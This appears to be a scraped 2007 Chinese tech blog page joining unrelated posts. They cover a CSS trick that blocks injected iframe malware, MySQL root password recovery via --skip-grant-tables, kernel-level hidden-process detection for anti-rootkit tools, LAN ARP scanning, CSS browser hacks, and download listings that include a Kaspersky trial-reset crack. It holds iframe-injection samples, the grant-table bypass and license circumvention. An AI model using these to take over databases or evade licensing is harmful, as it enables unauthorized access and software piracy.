标识一个八进制转义值或一个后向引用。如果 nm 之前至少有is preceded by at least nm 个获取得子表达式,则 nm 为后向引用。如果 nm 之前至少有 n 个获取,则 n 为一个后跟文字 m 的后向引用。如果前面的条件都不满足,若 n 和 m 均为八进制数字 (0-7),则 nm 将匹配八进制转义值 nm。
nml
如果 n 为八进制数字 (0-3),且 m 和 l 均为八进制数字 (0-7),则匹配八进制转义值 nml。
un
匹配 n,其中 n 是一个用四个十六进制数字表示的 Unicode 字符。例如,u00A9 匹配版权符号 (?)。
一行代码杜绝iframe挂马
今天把原理细细地讲一下吧:
IE Only——一般只有IE害怕iframe这样的挂马,所以就拿IE开刀。
在阅读本文之前,我们先了解一下expression;
IE5及其以后版本支持在CSS中使用expression,用来把CSS属性和 JavaScript脚本关联起来,这里的CSS属性可以是元素固有的属性,也可以是 自定义属性。就是说CSS属性后面可以是一段JavaScript表达式,CSS属性的值等于Javascript表达式执行的结果。在表达式中可以直接 引用元素自身的属性和方法,也可以使用其他浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。
很多朋友都知道CSS可以直接描述一个可视标记的外观。例如:p{color:red} 则网页里 所有p标记里的文字颜色都会变成红色;iframe不也是一个标记吗?开始跟灵儿写代码吧,呵呵:
iframe{...这里写描述外观的CSS代码;};
仔细想想要防止iframe里的东东被下载的最好办法是什么?核心来了,那就是切断iframe里的请求,切断请求就是要迅速销毁iframe对象。如何实现呢,上面不是介绍了expression吗?expression是可以执行JS脚本的哈。语法格式如下二种:
标记固有的CSS属性名:expression(JS表达式);
或 自定义属性名:expression(JS表达式);
在这里我们选择第二种,代码应该大致是这样
iframe{v:expression(JS表达式);}
接下来的问题是如何销毁网页里所有的iframe对象;使用JS实现的原理是这样 的:使iframe里的请求地址变成空白页(about:blank),再将iframe对象从DOM(文档对象模型)中移除就可以切断所有iframe 里的请求了。移除DOM节点的方法比较多,我这里就用 outerHTML这个属性吧。CSS代码如下:
iframe{v:expression(this.src='about:blank',this.outerHTML='');}
说明:前面的v字是灵儿自己定义的一个CSS属性,这里的this代表所有将要描 述外观的iframe对象,中间的逗号代表二句代码一起执行,没有执行优先顺序,这可是强有力的保证噢。about:blank代表空白页,大家都知道 的。outerHTML属性是DOM对象包含自身的HTML代码,而innerHTML则是DOM对象(不含本身)里面所包含的HTML代码。
爽快,代码写好了,就让我信来测试一下有没有效果。
首先,新建一个网页,插入以上的CSS代码(或在您现有的CSS代码里加入上面那句):
<style type="text/css">
iframe{v:expression(this.src='about:blank',this.outerHTML='');}
</style>
然后在这个页面插入几个IFRAME代码,假设它们是被挂的木马网页。代码如下:
<iframe xsrc=""></iframe>
<iframe xsrc="http://blog.sust.net.ru/"></iframe>草讯
<iframe xsrc=" http://blog.sust.net.ru/"></iframe> 涩果
保存为noiframe.htm,打开浏览器测试一下(本地测试需要启用顶部禁用 的脚本的提示条哦)。我这里使用抓包工具来测试,不过也没有必要使用抓包工具,一个最简单有效的方法是打开IE的缓存文件夹,先清空它,再刷新这个页面, 看看缓存文件夹里有没有这三个网站里的文件。如果没有,说明没有任何请求结果被返回——测试结果是令人满意的,我的脸上有些微笑 ^^*,这时同事递给我一块饼,蛮好吃的。
提示:Windows XP SP2的缓存文件夹位置 C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
细心的朋友发现问题来了,如果我自己的网页里要使用iframe这个东东怎么办?
答:如果要使自己的iframe显示在网页里,而别人挂的IFRAME马都不起作用,在CSS里加一个
#haoexe{v:expression() !important}
对应的IFRAME代码为:
<iframe id="haoexe" name="haoexe" xsrc="http://www.haoexe.com/"></iframe>
就OK了。
提示:IE7中优先执行标注有"!important"描述的样式,IE6不认识!important,采用就近原则,所以IE6的这个代码放在CSS的最后就可以了。
这里的f126,有很多朋友有疑问,他们问我为什么取"f126",我这样回答——这个f126是随意取的,只要下面的iframe里的ID属性和CSS里的一致就行了。同事又要递一块饼我吃,我说饱了哈..嘻嘻..
当然挂马者可以构造这样的代码
<iframe style="v:expression() !important" xsrc="URL"></iframe>
使我的防御方式失效,不过它得特意去看我的CSS代码里iframe里的前缀v,如果我的v是变化的呢,哈哈,是不是也不管用呢!
小结:以上的方法只是停止了iframe的请求并销毁了它本身,但以后的挂马方式改变了,例如改成
<script></script>
方式挂,就不能用这种方法来解决了;此这个方法不是最终的解决案,最终的解决方案是找出真正被挂IFRAME的原因,堵住源头。这可不是我的事哈!
推荐:MySQL密码恢复笔记
因为MySQL密码存储于数据库mysql中的user表中
所以只需要将我windows 2003下的MySQL中的user表拷贝过来覆盖掉就行了
在c:\mysql\data\mysql\(linux 则一般在/var/lib/mysql/mysql/)目录下有三个user表相关文件user.frm、user.MYD、user.MYI
user.frm //user表样式文件
user.MYD //user表数据文件
user.MYI //user表索引文件
为保险起见,三个都拷贝过来,不过其实如果之前在要恢复的那个MySQL上没有更改过表结构的话,只要拷贝user.MYD就行了
然后#. /etc/rc.d/init.d/mysql stop
#. /etc/rc.d/init.d/mysql start
#mysql -u root -p XXXXXX
好了,可以用windows 2003下mysql密码登陆了
mysql>use mysql
mysql>update user set Password=PASSWORD('xxxxxx') where User='root';
这时候会出错,提示user表只有读权限
我分析了一下原因,只这样的,因为user.*文件的权限分配是windows 2003下的,在windows 2003下我ls -l一看权限是666
在linux下我一看,拷过来后权限变成了600(其实正常情况下600就行了,只不过这里的文件属主不是mysql,拷过来后的属主变为了root,所以会出现权限不够,这时候如果你改成权限666则可以了,当然这样不好,没有解决问题的实质),在/var/lib/mysql/mysql/下ls -l看了一下再
#chown -R mysql:mysql user.*
#chmod 600 user.*
//OK,DONE
重起一下MYSQL
重新连接
mysql>use mysql
mysql>update user set Password=PASSWORD('xxxxxx') where User='root';
mysql>FLUSH PRIVILEGES;
有一点值得注意:如果你windows 下mysql如果是默认配置的话,注意要还要执行
mysql>delete from user where User='';
mysql>delete from user where Host='%';
mysql>FLUSH PRIVILEGES;
好了,到这里恢复密码过程就完成了
这个方法么就是有点局限性,你必须也具备另外的user表文件
其他还有几种方法
其它方法一(这个是网上流传较广的方法,mysql中文参考手册上的)
1. 向mysqld server 发送kill命令关掉mysqld server(不是 kill -9),存放进程ID的文件通常在MYSQL的数据库所在的目录中。
killall -TERM mysqld
你必须是UNIX的root用户或者是你所运行的SERVER上的同等用户,才能执行这个操作。
2. 使用`--skip-grant-tables' 参数来启动 mysqld。 (LINUX下/usr/bin/safe_mysqld --skip-grant-tables , windows下c:\mysql\bin\mysqld --skip-grant-tables)
3. 然后无密码登录到mysqld server ,
>use mysql
>update user set password=password("new_pass") where user="root";
>flush privileges;
。你也可以这样做:`mysqladmin -h hostname -u user password 'new password''。
4. 载入权限表: `mysqladmin -h hostname flush-privileges' ,或者使用 SQL 命令`FLUSH PRIVILEGES'。
5.killall -TERM mysqld
6.用新密码登陆
其它方法二
直接用十六进制编辑器编辑user.MYD文件
不过这个里面我要说明一点,我这里编辑的时候发现个问题,加密的密码串有些是连续存储的,有些的最后两位被切开了,后两位存储在后面其他地方.这一点我还没想明白.还有注意一点就是编辑的是加密过的密码串,也就是说你还是需要另外有user表文件。这种方法和我最上面介绍的方法的区别在于,这种方法直接编辑linux下的user表文件,就不需要重新改文件属主和权限了
推荐:简单认识Anti-RootKit
关于进程检测:其实最早在R3下隐藏进程的方法已经很早开始流行起来被用到各种软件上来,在R0下如断ActiveProcessLinks链,擦掉句柄表等等,一步步的发展渐渐的更强大起来一些技巧和方法开始出来和流行起来,如FUTO,phide_ex等。。。。。。
检测隐藏进程的方法可以把一些现在流行的方法组合起来用,首先可以通过进程的EPROCESS结构中的进程活动链表ActiveProcessLinks来进行扫描一边,可以通过进程句柄表的枚举通过EPROCESS的HANDLE_TABLE,HANDLE_TABLE结构中的HandleTableLis链表来扫描一边来获得一些EPROCESS,可以通过定位PsLookupProcessByProcessId代码中的PspCidTable链表扫描一边获得一些EPROCESS,PspCidTable在各系统中枚举是不太一样的,也可以通过先找出KiWaitInListHead,KiWaitOutListHead和KiDispatcherReadyListHead这些链表然后对这些链表扫描获得一些EPROCESS,以上具体的实现代码可以GOOGLE之网上实现的代码已经很多了,再者也可以找到内核中的线程切换SwapContext函数进行HOOK下的,在自己实现的SwapContext函数根据线程的偏移量找出进程的EPROCESS结构,把上面获得的所有EPROCESS汇集起来还需要判断下当前进程是否是真正的活着的:)可以通过EPROCESS里的标志位Flags(如XP 下0x248)一些标志判断下的,还要注意下对上面这些链表汇集起来是会有重复的进程的,在你自己的汇集函数中根据EPROCESS判断下的 废话了,感觉实现了上面的一些方法对付一般的隐藏进程已经足够了的,但厉害的RK还是有的,现在存在可以逃过这些方法的RK的,在进程EPROCESS的结构里偏移0x1f8(XP SP2下)有个struct MMSUPPORT Vm结构:
struct _MMSUPPORT
{
/* off 0x00000000 */ union LARGE_INTEGER LastTrimTime;
/* off 0x00000008 */ struct MMSUPPORT_FLAGS Flags;
/* off 0x0000000C */ unsigned long PageFaultCount;
/* off 0x00000010 */ unsigned long PeakWorkingSetSize;
/* off 0x00000014 */ unsigned long WorkingSetSize;
/* off 0x00000018 */ unsigned long MinimumWorkingSetSize;
/* off 0x0000001C */ unsigned long MaximumWorkingSetSize;
/* off 0x00000020 */ struct _MMWSL* VmWorkingSetList;
/* off 0x00000024 */ struct LIST_ENTRY WorkingSetExpansionLinks;
/* off 0x0000002C */ unsigned long Claim;
/* off 0x00000030 */ unsigned long NextEstimationSlot;
/* off 0x00000034 */ unsigned long NextAgingSlot;
/* off 0x00000038 */ unsigned long EstimatedAvailable;
/* off 0x0000003C */ unsigned long GrowthSinceLastEstimate;
};
在这个结构里+0x24有个 WorkingSetExpansionLinks他也是个LIST_ENTRY链表的,遍例下他可以获得进程的EPROCESS的,如
PEPROCESS eprocess, eprocess2
eprocess =PsGetCurrentProcess();
lp=(PLIST_ENTRY)(*(PVOID )((PUCHAR)eprocess+0x1f8+0x24+4));
cur =lp->Flink;
for(;cur!=lp;cur=cur->Flink)
{
eprocess2=(PEPROCESS)((ULONG)cur-0x1f8-0x24);
PVOID session= (PVOID)(*(PULONG)((PCHAR) eprocess2+ 0x170));
if(MmIsAddressValid(session)){
AddProcess(eprocess2);
}
}
再者在进程EPROCESS的结构里偏移0x0b4(XP SP2下)存在个struct _LIST_ENTRY SessionProcessLinks结构,他也是个链表的 :)通过遍例他也可以的获得一些EPROCESS。还有个地方可以的 呵呵 在每个线程对象里(ETHREAD)偏移0x34里有个struct _KAPC_STATE ApcState 结构的在_KAPC_STATE结构里偏移0x10,再者也可以通过遍例内存来查找隐藏进程,从内存MmSystemRangeStart开始到System进程的EPROCESS地址就可以了主要是判断这个地址是否是个有效的进程,方法挺多的如判断下是否是进程对象这个地址如果是EPROCESS看看PID,ThreadListHead,ReadyListHead是否正确有效的等等,很多方法的应该组合起来判断下保证肯定是进程就可以了,还可以通过HOOK一些函数的如KeUpdateRunTime,KeDispatchInterrupt等来检测隐藏进程,还可以设置下PsSetCreateProcessNotifyRoutine在每次进程创建的时候对线程插入个APC的来进行统计检测的,其实我觉得对于检测隐藏进程的方法技巧还有很多,伟大的WINDOWS还需要我们挖掘呀。进程的结束可以通过调用ZwTerminateProcess或者调用未公开的PspTerminateProcess函数的,关于这个函数在网上已经很广泛了,可以通过遍例进程的每个线程调用PspTerminateThreadByPointer的结束每个线程的,这些未公开的函数都需要事先的查找和定位的,还可以使用RKU(RkUnhooker)的内存清零大法的切换到该进程然后对该进程内存清零RtlZeroMemory,再者也可以对该进程的每个线程插入APC来结束进程的,最后如果你有时间你也可以通过观看2K的代码自己来实现进程的结束。
内核驱动检测首先你可以通过ZwQuerySystemInformation的SystemModuleInformation功能号来枚举内核驱动的,然后可以通过打开目录对象,进行枚举代码就略了GOOGLE之吧,也可以通过枚举IoDriverObjectType和IoDeviceObjectType对象类型进行查找枚举顺便把他们的DeviceObject和AttachedDevice等也枚举下吧,接着可以通过查找PsLoadedModuleList对该链进行下枚举的,可以对这个目录对象再搜索一边的”\\Driver”。通过对上面这些方法的枚举可以查找到很多驱动对象了,相信现在你的驱动对象链表已经够多了 嘿嘿,够累吧,接下来,你可以对上面你已经查找到的驱动对象的0x38偏移MajorFunction查找一边看看他的地址是否在已知的驱动地址范围内,如不在你知道该怎么办的,再对MajorFunction里的每个例程地址找一边的从0到28也看看他们的地址是否在已知的驱动地址范围内,最后再说一种的方法的,也可以像进程那样内存枚举的,像进程那样从MmSystemRangeStart开始枚举吧,判断下是否是PE文件有没有那几个关键PE特征的,如MZ,PE等,看看是否存在PE文件头是否有效,看看这个地址是否已经是你检测出来的驱动地址的,避免重复的,看看你所检测出来的所有驱动对象的MajorFunction[X]和DriverStartIo是否有在这个地址,如果有并且这个地址你先前没有检测出来没有重复的他很有可能是个未知的驱动的,其实和进程内存查找一样的,关键是判断的,需要判断对的,肯定他是某个对象的然后你就可以把他加如到你自己的某个链表里。最后也可以通过对一些关键函数的HOOK 如ExAllocatePool,ExAllocatePoolWithTag等在自己实现这些函数里记录下esp+0x24地址的,对这些地址进行判断的来看看这些地址是否包含在某些内核模块当中当然还需要判断下他是否就是个PE驱动文件,这种方法就是RKU用到的方法的。驱动就说这些吧。
前面说得太多了,后面说少点吧 嘿嘿。
关于SSDT HOOK的检测,通过定位ntoskrnl.exe磁盘文件里KeServiceDescriptorTable与内存中的KeServiceDescriptorTable对各个服务函数进行比较就可以的。代码网上很多的。
关于代码HOOK检测,我也不想说什么的,可以对内存中ntoskrnl.exe 的导入函数和导出函数与磁盘文件中的地址进行比较,也可以通过对ntoskrnl.exe PE文件里的某些节(section)进行扫描的,再加上对一些关键文件的导入函数和导出函数进行扫描,加上对某些关键驱动(如文件系统驱动)的MajorFunction里的每个例程进行扫描,再者对IDT,GDT扫描下的。
关于注册表隐藏的检测,首先可以用到把一些注册表相关的函数INLINE HOOK的SSDT HOOK的都恢复下再使用的其实所谓的不相关的也需要UNHOOK下的,如badrkdemo 他就HOOK了ObOpenObjectByName函数组织对注册表的访问的 具体的看情况来吧 哈哈,也可以通过对一些未公开的函数进行使用的CM系列函数的,再者可以通过分析HIVE文件的来显示注册表各个项的,通过分析HIVE文件其实也不是很难的,了解了HIVE文件结构和HIVE文件的组织的,就可以读他了,这些资料网上可以找到的,通过读HIVE文件来给用户显示当前注册表各个项的可以的但我并不推荐自己改写系统的HIVE文件的,如提供DELETE MODIFE等功能的我觉得如改的不好,或结构没有完全清楚的,写到HIVE文件里是错误的,那么当再次启动时系统读HIVE文件时就不好过了,自己一点愚见,如果你够强大当然是没有问题的。
关于隐藏文件的检测,现在流行的隐藏文件的RK很多的,如Unreal.A,AK922等,自己可以通过在驱动中自己构建IRP包自己发送给文件驱动的方法的,还有就是先恢复些关键函数的,像注册表那样的,恢复INLINE HOOK SSDT HOOK,文件驱动关键例程HOOK的,现在流行HOOK内核的完成例程的,HOOK是防不胜防的,还要注意下附加在文件系统上的一些过滤驱动的,还有就是通过使用DeviceIoControl发送一些特殊的IoControlCode控制代码给文件系统的,这需要对文件系统的熟悉的,还有就是自己分析磁盘文件的对FAT32,NTFS等格式文件系统自己分析来查找文件的,关于自己分析磁盘文件的,网上的信息和资料也是很多的,首先判断下属于哪个文件系统,然后根据特定的文件系统格式自己分析的就可以的,其实这些方法的关键是怎么读和写的,读和写做到最底层,把读和写做好我想他检测文件功能是强大的。
够了,一些ARK的功能说到这就可以了,我希望各位搞RK的和ARK的人看了之后又会作出很多厉害,强大的东西来,希望看了之后会对各位有一点帮助的,希望可以在当前流行的RK和ARK中会有更新更强大的东西出现的,来激励我们学习和前进的,引用一位好友的话“现在感觉大部分木马病毒什么的都是用的老一套东西的什么SSDT HOOK的。。。。。。,希望可以有些新的技术出现的”,其实现在有些RK是很牛的,其实都是一个目标的 希望技术和知识可以不断进步的 嘿嘿。一个没有未来的人:)谈谈关于RK和ARK未来的发展 RK 更底层,ARK也更底层,攻和防,RK和ARK的斗争会继续的,RK会出现固化在某个文件里,会在重装系统后还会存在,会写到硬件中。。。。。。,ARK势必也需要对这些问题关注的。
谢谢各位看完文章的,本人一介小菜知识有限,以上是自己的一点愚见,如有什么错误和不足之处,请各位指教。
本文之中的有些知识是朋友和一些牛人给予帮助,谢谢他们的帮助。
07年最不安全10款软件 MSN/Firefox均上榜
据国外媒体报道,安全厂商Bit9近日评出了2007年最容易遭受攻击的10款Windows软件。结果,雅虎Messenger排名首位。
排行榜显示,雅虎和苹果有个两款产品上榜,分别为苹果QuickTime 7.2和iTunes 7.3.2,以及雅虎Messenger 8.1.0.239和Widgets 4.0.5。
相比之下,微软只有Windows Live (MSN) Messenger 7.0, 8.0一款产品上榜。而颇为流行的Mozilla Firefox 2.0.0.6浏览器也榜上有名。
以下为Bit9评出的2007年最容易遭受攻击的10款Windows软件:
1. Yahoo! Messenger(雅虎通)8.1.0.239及以前版本
2. Apple QuickTime 7.2
3. Mozilla Firefox 2.0.0.6
4. 微软Windows Live (MSN) Messenger 7.0, 8.0
5. EMC VMware Player (及其他产品)2.0, 1.0.4
6. Apple iTunes 7.3.2
7. Intuit QuickBooks Online Edition 9其以前版本
8. Sun Java Runtime 1.6.0_X
9. Yahoo! Widgets 4.0.5及以前版本
10. Ask.com Toolbar 4.0.2.53及以前版本
如何确定网络中IP地址被arp协议欺骗盗用
答:在网络中出现IP地址冲突的问题是非常麻烦的,一方面他扰乱了我们网络管理员管理网络,另一方面他影响了普通用户的正常上网。特别是对于部分中小公司来说经常将IP地址与网络资源访问权限相关联,一旦IP地址被占用非法用户将能非法使用网络资源。遇到这种情况我们如何查出哪个IP地址被占用呢?
正如前面网友提出的问题一样,当公司使用手动设置IP地址且没有有效管理设置的IP地址的话,很容易出现随意设置地址并经常冲突的问题。遇到这种情况也需要我们学会扫描整个网络,将已经连接到网络中的IP地址进行记录,防止地址冲突现象的发生。我们主要有以下几个办法可以帮助大家扫描网络中已用的IP地址。
方法一:原始ping法
第一个方法比较简单,而且受环境限制比较大。众所周知在没有安装防火墙和设置过滤规则的计算机上都容许ICMP协议数据包的通过,那么我们可以通过“ping ip地址”这个命令来查看该IP地址是否有计算机使用。
通过任务栏的“开始->运行”,输入CMD后回车进入命令行模式。假设公司网络是192.168.1.0/255.255.255.0,那么我们可以通过ping 192.168.1.1,ping 192.168.1.2......ping 192.168.1.254来测试IP地址是否被占用。
由于原始ping法比较简单,这里就不详细说明了,但是这种方法遇到计算机上安装了防火墙对ICMP协议进行过滤的话,或者公司交换机和路由器上对ICMP实施ACL访问控制列表过滤的话就不可行了。因此这个方法受的局限比较大,一般测试的成功率不高,很容易把安装了防火墙的计算机对应的IP地址认为没有被使用。
方法二:扫描器扫描法
以前笔者在进行网络安全工作时就经常使用扫描器扫描网络中各个主机的漏洞,那么现在我们完全可以使用此方法来查看本网络有哪些IP地址被占用。由于扫描器扫描时并不是仅仅使用ICMP协议进行ping,我们可以设置,让扫描器多扫描几个端口,多扫描几个服务。这样即使计算机上安装了防火墙或者交换机上有访问控制列表过滤ICMP协议,只要该计算机开放了某些端口或某些服务,就不会出现漏报的问题。
通过扫描器扫描出来的IP地址列表还可以导出成HTML文件或TXT文件,这样方便我们保存和统计。
当然扫描器工具很多,这里推荐大家使用安全焦点出的X-SCAN和LANHELPER,感兴趣的读者可以自行下载使用。
使用扫描器扫描法可以查看出网络中几乎全部计算机使用的IP地址,但是对于那些极个别的设置了防火墙的复杂规则,过滤了大部分常用端口和常见服务的计算机来说,还是会或多或少的出现漏报或错报的问题,再加上扫描器扫描法还需要我们下载专门的工具,所以也给操作上带来了不方便。
方法三:sniffer监视法
作为网络管理员的我们应该都会使用sniffer,那么我们只需要在网络中开启sniffer对网络传输的数据包进行监视,过一段时间就会查出有哪些IP地址有数据包发出,这样就可以确定该IP地址已经被占用了。
不过用sniffer的方法不能将已经占用的IP地址保存成文件输出,而且给人有一种大材小用的感觉,毕竟sniffer正统不是用来做扫描IP地址的。
方法四:ARP缓存法
实际上笔者还发现了一个方法可以解决网友提出的问题,他的原理是通过ARP缓存来查看获得的,不用使用任何第三方工具,使用系统自带的ARP -A即可。
ARP缓存法是以前面介绍的ping法为基础而来的,对于安装了防火墙或设置过滤规则的计算机来说直接ping该IP地址是得不到返回信息的,但是有一点我们必须注意,那就是虽然无法从ping的返回信息中得出该IP地址是否被占用,但是从ARP缓存中却可以看出来。防火墙等过滤设置可以不容许ICMP协议返回数据包给源地址,但是由于ARP是工作在二层上的,所以在ICMP协议数据包被过滤前ARP已经通过查看MAC的方式获得了网络中在线主机的MAC地址。
只要网络中的计算机想上网,那么他一定会将自己网卡的MAC地址告诉与其连接的交换机,接下来交换机也会进一步将他知道的MAC地址信息反馈给使用ping的主机。这样我们在使用ping的主机上就能够通过是否获得MAC地址的方式来了解该IP地址对应的计算机是否在线了。
通过任务栏的“开始->运行”,输入CMD后回车进入命令行模式。假设公司网络是192.168.1.0/255.255.255.0,那么我们可以通过ping 192.168.1.1,ping 192.168.1.2......ping 192.168.1.254来测试IP地址是否被占用。当然不管ping返回的是通还是不通,全部ping完后执行arp -a命令显示ARP缓存表,出现在缓存表中的IP地址就是被占用的地址。
对批处理命令熟悉的网络管理员还可以自行编辑一个BAT命令来完成上面的一系列ping操作,BAT文件的内容如下:
FOR /L %i IN (0,1,255) Do ping X.X.X.%i -n 1
arp -a > IP.txt
这个批处理文件将列出所有正在使用的IP地址跟他们的MAC地址,保存到ip.txt文件中。当然语句中的X.X.X.%i是可以进行修改的,例如公司网络为192.168.1.0/255.255.255.0那么应该修改为
FOR /L %i IN (0,1,255) Do ping 192.168.1.%i -n 1
arp -a > IP.txt
最后再把这个方法的原理进行总结——我们向网段内所有IP地址发送一个icmp包,也许他屏蔽了ICMP包,但是这不要紧,只要他使用了该IP地址就一定会回应一个他的mac地址的数据包过来,这样用arp -a察看本地的arp缓存就能看到他的IP地址跟MAC地址了。
小提示:
我们也可以使用nbtstat -A IP命令来替代arp -a命令。
也许有人会问计算机能够禁止ARP数据包的通过呢?实际上计算机上能禁止ICMP包,但是是不可能禁止arp包的,如果禁止了arp,那么交换机就找不到该计算机了,该计算机也无法连接网络,访问网络上的任何资源了。所以说ARP缓存法让我们通过现象看到了本质,即使ping无法返回任何有用信息,但是实际上他已经帮助我们找出了在线主机对应的MAC地址,进一步了解了他的IP地址。
总结:
本文介绍了四种方法来解决查看网络中已经使用的IP地址的办法,当然各种方法有各种方法的特点,有的使用了第三方工具但是查看地址列表更加清晰,有的没有使用软件仅仅采用系统自带命令但是受到网络环境的局限,而有的虽然没有任何工具,但是需要编写批处理文件,难度较大。当然究竟采取哪个方法来解决实际问题,是需要我们这些网络管理员自己去比较,自己去选择的。个人推荐使用第四种方法——ARP缓存法。
CSS兼容IE6,IE7,FireFox之一
关于CSS对各个浏览器兼容是个非常让人头疼的事情了, 网络上的教程遍地都是.今天在discuz.net上发现了一篇不错的东西,就转载过来和大家共享.可以当作CSS兼容IE6,IE7,FireFox典范了,值得去记录下。发现自己很久没有转载东西。
注:IE都能识别*;标准浏览器(如Firefox,Opera,Netscape)不能识别*;IE6能识别*,但不能识别 !important,IE7能识别*,也能识别!important;FF不能识别*,但能识别!important;
写两句代码来控制一个属性,区别Firefox与IE6:
background:orange;*background:blue;
//这一句代码写出来时,你用firefox或其它非IE浏览时,会发现,写了该代码的区域背景是橙色的,如果用IE浏览,却是蓝色的,这是因为IE都能识别*;标准浏览器(如Firefox,Opera,Netscape)不能识别*;
写两句代码来控制一个属性,区别IE7与IE6:
background:green !important;background:blue;
//这一句代码写出来时,你用IE7浏览,会发现,写了该代码的区域背景是绿色的,如果用IE6浏览,却是蓝色的,这是因为IE7能识别!important*,一但识别了,就执行,忽略了后面的那一句,但IE6却不能识别!important,所以前面部分跳过,直接执行了后半部份。
写两句代码来控制一个属性,区别Firefox与IE:
background:orange; *background:green;
//这一句代码写出来时,你用Firefox浏览,会发现背景是橙色的,而IE里却是绿色的,很简单,因为Firefox不能识别*,而IE6,IE7都可以识*
写三句代码来控制一个属性,区别Firefox,IE7,IE6:
background:orange;*background:green !important;*background:blue;
//这一句会使在Firefox在,背景呈橙色,IE7中为绿色,IE6中为蓝色,道理和前面一样,Firefox不能识别*,所以后面两句都不执行,直接执行第一句,IE7当然也能执行第一行代码,但是因为第二句,他也能识别,所以就执行了第二句代码,把前面的效果给过滤了,而最后一句,IE7是不能识别的。IE6不能识别!imprtant,本来运行了第一句代码了,第二句不能识别,那就理所当然的执行了最后一句。
注意事项:
1、float的div一定要闭合。
例如:(其中floatA、floatB的属性已经设置为float:left;)
- < #div id="floatA" >
- < #div id="floatB" >
- < #div id="NOTfloatC" >
这里的NOTfloatC并不希望继续平移,而是希望往下排。
这段代码在IE中毫无问题,问题出在FF。原因是NOTfloatC并非float标签,必须将float标签闭合。
在
- < #div class="floatB">
- < #div class="NOTfloatC">
之间加上
- < #div class="clear">
这个div一定要注意声明位置,一定要放在最恰当的地方,而且必须与两个具有float属性的div同级,之间不能存在嵌套关系,否则会产生异常。
并且将clear这种样式定义为为如下即可:
- .clear{clear:both;}
此外,为了让高度能自动适应,要在wrapper里面加上overflow:hidden;
当包含float的box的时候,高度自动适应在IE下无效,这时候应该触发IE的layout私有属性(万恶的IE啊!)用zoom:1;可以做到,这样就达到了兼容。
例如某一个wrapper如下定义:
- .colwrapper{overflow:hidden;zoom:1;margin:5px auto;}
2、margin加倍的问题。
设置为float的div在ie下设置的margin会加倍。这是一个ie6都存在的bug。
解决方案是在这个div里面加上display:inline;
例如:
- < #div id="imfloat">
相应的css为
- #IamFloat{
- float:left;
- margin:5px;/*IE下理解为10px*/
- display:inline;/*IE下再理解为5px*/}
3、关于容器的包涵关系
很多时候,尤其是容器内有平行布局,例如两、三个float的div时,宽度很容易出现问题。在IE中,外层的宽度会被内层更宽的div挤破。一定要用Photoshop或者Firework量取像素级的精度。
4、关于高度的问题
如果是动态地添加内容,高度最好不要定义。浏览器可以自动伸缩,然而如果是静态的内容,高度最好定好。(似乎有时候不会自动往下撑开,不知道具体怎么回事)
5、最狠的手段 - !important;
如果实在没有办法解决一些细节问题,可以用这个方法.FF对于”!important”会自动优先解析,然而IE则会忽略.如下
.tabd1{
background:url(/res/images/up/tab1.gif) no-repeat 0px 0px !important; /*Style for FF*/
background:url(/res/images/up/tab1.gif) no-repeat 1px 0px; /* Style for IE */}
值得注意的是,一定要将xxxx !important 这句放置在另一句之上,上面已经提过
常见兼容问题:
1.DOCTYPE 影响 CSS 处理
2.FF: div 设置 margin-left, margin-right 为 auto 时已经居中, IE 不行
3.FF: body 设置 text-align 时, div 需要设置 margin: auto(主要是 margin-left,margin-right) 方可居中
4.FF: 设置 padding 后, div 会增加 height 和 width, 但 IE 不会, 故需要用 !important 多设一个 height 和 width
5.FF: 支持 !important, IE 则忽略, 可用 !important 为 FF 特别设置样式
6.div 的垂直居中问题: vertical-align:middle; 将行距增加到和整个DIV一样高 line-height:200px; 然后插入文字,就垂直居中了。缺点是要控制内容不要换行
7.cursor: pointer 可以同时在 IE FF 中显示游标手指状, hand 仅 IE 可以
8.FF: 链接加边框和背景色,需设置 display: block, 同时设置 float: left 保证不换行。参照 menubar, 给 a 和 menubar 设置高度是为了避免底边显示错位, 若不设 height, 可以在 menubar 中插入一个空格。
9.在mozilla firefox和IE中的BOX模型解释不一致导致相差2px解决方法:
div{margin:30px!important;margin:28px;}
注意这两个margin的顺序一定不能写反,据阿捷的说法!important这个属性IE不能识别,但别的浏览器可以识别。所以在IE下其实解释成这样:
div{maring:30px;margin:28px}
重复定义的话按照最后一个来执行,所以不可以只写margin:XXpx!important;
10.IE5 和IE6的BOX解释不一致
IE5下
div{width:300px;margin:0 10px 0 10px;}
div的宽度会被解释为300px-10px(右填充)-10px(左填充)最终div的宽度为280px,而在IE6和其他浏览器上宽度则是以300px+10px(右填充)+10px(左填充)=320px来计算的。这时我们可以做如下修改
div{width:300px!important;width /**/:340px;margin:0 10px 0 10px}
关于这个/**/是什么我也不太明白,只知道IE5和firefox都支持但IE6不支持。
11.ul标签在Mozilla中默认是有padding值的,而在IE中只有margin有值所以先定义
ul{margin:0;padding:0;}
就能解决大部分问题
推荐]隐身僵尸木马专杀工具 V1.0
| 软件大小: | 673 K |
| 软件语言: | 简体中文 |
| 软件类型: | 国产软件 |
| 运行环境: | Win9x/NT/2000/XP/2003 |
| 添加时间: | 2007-9-21 19:32:11 |
| 软件评级: | ★★★ |
| 授权方式: | 免费版 |
| 开 发 商: | 佚名 |
| 软件添加: | 水土不服 |
| 软件介绍: |
近日,一款名为“隐身僵尸”的木马程序正在泛滥,目前已经有大量网民中招。据悉,该木马正处于潜伏期,中招的电脑并无明显不适的症状,其目的是为了更好的隐藏在用户电脑中伺机偷窃。据360安全中心透露,由于此木马采用了非常狡猾的躲藏方式,目前国内所有杀毒软件都无法查杀该木马。360安全中心已经在第一时间内发布了专杀工具,请广大用户下载使用。 |
| 下载地址: |
| 点击下载=>[迅雷专用] 点击下载=>[山东电信] 点击下载=>[山东网通] 点击下载=>[浙江电信] 点击下载=>[河南网通] 点击下载=>[河南电信] |
| 软件大小: | 316 K |
| 软件语言: | 简体中文 |
| 软件类型: | 国产软件 |
| 运行环境: | Win9x/NT/2000/XP/2003 |
| 添加时间: | 2007-9-28 14:24:00 |
| 软件评级: | ★★★ |
| 授权方式: | 免费版 |
| 开 发 商: | 文博 |
| 软件添加: | 水土不服 |
| 软件介绍: |
中秋,卡巴封了很多KEY,导致很多人不能正常使用 这个软件可以解除卡巴试用1个月的限制,永久免费使用卡巴6.0-7.0 激活那里点激活试用版本,到期一个月后使用该软件后又能再使用一个月 |
| 下载地址: |
| 点击下载=>[迅雷专用] 点击下载=>[山东电信] 点击下载=>[山东网通] 点击下载=>[浙江电信] 点击下载=>[河南网通] 点击下载=>[河南电信] |
为什么我们的电脑频频中招?
